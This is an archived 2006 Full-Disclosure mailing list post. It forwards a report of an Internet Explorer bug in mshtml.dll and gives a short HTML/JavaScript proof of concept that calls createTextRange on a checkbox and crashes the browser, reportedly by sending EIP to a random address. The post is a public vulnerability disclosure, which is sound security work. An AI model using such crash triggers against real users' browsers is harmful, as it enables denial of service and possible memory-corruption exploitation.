lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed Mar 22 18:11:58 2006 From: Security at peadro.net (Terminal Entry) Subject: FW: IE crash The PoC below also causes MS FrontPage 2K3 to crash when previewing the code -----Original Message----- From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Stelian Ene Sent: Wednesday, March 22, 2006 3:13 AM To: full-disclosure@...ts.grok.org.uk Cc: bugtraq@...urityfocus.com Subject: [Full-disclosure] IE crash I can't find any info on this delicious IE bug, but it seems to be publicly known: <input type="checkbox" id='c'> <Xcript><!-- r=document.getElementById("c"); a=r.createTextRange(); --></Xcript> It will badly access a (virtual?) pointer table, making EIP to jump at a random address. This has various effects on the system I've tested with, including crashing. It works on these versions of mshtml.dll: XP SP2: 6.0.2900.2802 - latest WS2003: 6.0.3790.0 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060322/ce91f04f/attachment.html
Powered by blists - more mailing lists